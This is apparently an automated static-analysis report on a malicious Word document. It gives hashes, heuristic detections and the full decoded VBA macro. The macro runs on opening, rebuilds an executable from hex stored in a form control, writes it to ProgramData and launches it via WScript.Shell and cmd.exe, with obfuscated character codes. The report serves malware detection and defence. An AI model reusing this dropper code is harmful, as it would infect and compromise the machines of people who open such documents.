Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 e4a93f11657c6844…

Verdict: MALICIOUS
File type: Office (OLE) / .DOC

Size: 2.79 MB
Created: 2025-12-15 08:52:00
Authoring application: Microsoft Office Word
First seen: 2026-06-23
MD5: e87bb727393264464b37aee46c22a6d7
SHA-1: 356a6f7c9593414baa3f488679c06a2dbeedf4c7
SHA-256: e4a93f11657c6844c0c50babe574286b57b3b75b68e0108cf645a90de84de7ed
Risk score: 350

Heuristics (10)

  • ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script:
        If objName <> "WScript.Shell" Then
  • Embedded PE decoded from VBA/UserForm payload string [critical] OLE_VBA_EMBEDDED_PE_DROPPER
    The VBA macro carries a Windows executable encoded as a base64 or hex string, split across macro string literals or stored in a UserForm control's text (e.g. TextBox1.Text), and rebuilds it at run time, typically writing it to %ProgramData% or %TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
        Set executor = CreateObject(objName)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs and the channel that reached each:
      • http://https://
        Channel: In document text (OLE body)
      • http://schemas.openxmlformats.org/officeDocument/2006/
        Channel: In document text (OLE body)
      • http://schemas.openxmlformats.org/officeDocument/2006/bibliography
        Channel: In document text (OLE body)
      • http://schemas.openxmlformats.org/officeDocument/2006/customXml
        Channel: In document text (OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main
        Channel: In document text (OLE body)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 3821 bytes
  SHA-256: 1ecf124e926b522b95c6055516154ae681efc88dda5e06811fb4e2e32c8fe363

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Label1, 0, 0, MSForms, Label"
Sub love_me__()
    Dim varA As String, varB As String, varC As String
    Dim varD As String, varE As String, objName As String
    Dim executor As Object, instruction As String
    Dim tempVal As Integer, i As Integer
    
    For i = 1 To 13
        Select Case i
            Case 1: tempVal = 87
            Case 2: tempVal = 83
            Case 3: tempVal = 99
            Case 4: tempVal = 114
            Case 5: tempVal = 105
            Case 6: tempVal = 112
            Case 7: tempVal = 116
            Case 8: tempVal = 46
            Case 9: tempVal = 83
            Case 10: tempVal = 104
            Case 11: tempVal = 101
            Case 12: tempVal = 108
            Case 13: tempVal = 108
        End Select
        objName = objName & Chr(tempVal)
    Next i
    
    If objName <> "WScript.Shell" Then
        MsgBox "Validation failed", vbCritical
        Exit Sub
    End If
    
    On Error GoTo ErrorHandler
    
    Set executor = CreateObject(objName)
    
    If executor Is Nothing Then
        MsgBox "Object creation failed", vbCritical
        Exit Sub
    End If
    
    Dim cmdParts(1 To 17) As Integer
    cmdParts(1) = 99:  cmdParts(2) = 109:  cmdParts(3) = 100
    cmdParts(4) = 46:  cmdParts(5) = 101:  cmdParts(6) = 120
    cmdParts(7) = 101: cmdParts(8) = 32:   cmdParts(9) = 47
    cmdParts(10) = 99: cmdParts(11) = 32:  cmdParts(12) = 67
    cmdParts(13) = 58: cmdParts(14) = 92:  cmdParts(15) = 80
    cmdParts(16) = 114: cmdParts(17) = 111 ' ÇÏÇãå...
    
    For i = 1 To 17
        instruction = instruction & Chr(cmdParts(i))
    Next i
    instruction = instruction & "gramData\CertificationKit.ini"
    executor.Run instruction, 0, False
    
    Set executor = Nothing
    Exit Sub

ErrorHandler:
    ' :)
End Sub



Sub WriteHexToFile()
    Dim hexString As String
    Dim byteData() As Byte
    Dim i As Long
    Dim fileNum As Integer
    Dim filePath As String

    hexString = UserForm1.TextBox1.Text

    hexString = Replace(hexString, " ", "")
    hexString = Replace(hexString, vbCrLf, "")
    hexString = Replace(hexString, vbLf, "")
    hexString = Replace(hexString, vbCr, "")

    If Len(hexString) Mod 2 <> 0 Then
        MsgBox "Hex string. length must0 be even. :(", vbExclamation
        Exit Sub
    End If

    ReDim byteData(Len(hexString) \ 2 - 1)
    For i = 0 To UBound(byteData)
        byteData(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))
    Next i

    filePath = "C:\\ProgramData\\CertificationKit.ini"

    fileNum = FreeFile
    Open filePath For Binary Access Write As #fileNum
        Put #fileNum, , byteData
    Close #fileNum
    
    If Cos(70 * 3.14159265 / 180) = 0 Then
        MsgBox "Hi, have a nice time :)" & filePath
    End If
End Sub



Private Sub Document_Open()


On Error GoTo AAAA
    
    Dim pth As String
    
    WriteHexToFile
    Dim fff As String
    love_me__
        
AAAA:
    If Cos(70 * 3.14119265358979 / 180) = 0 Then
        MsgBox "Hi :), have a nice time :)" & filePath
    End If


End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{ECD5CC13-BB50-4575-8B30-F8F9797EB3DE}{C185F02F-46D9-423B-BE3B-8DD30BC48620}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Artifact 2
  Filename: vba_embedded_payload.bin
  Kind: vba-embedded-pe
  Source: decoded from a hex/base64 payload string in a VBA UserForm control or macro literal
  Size: 1288192 bytes
  SHA-256: 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58
  Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely
    Carved artifact contains 2 shell/COM execution token(s).
    Carved artifact contains 7 long base64-like blob(s).
    Carved artifact contains 1 long hex-escaped blob(s).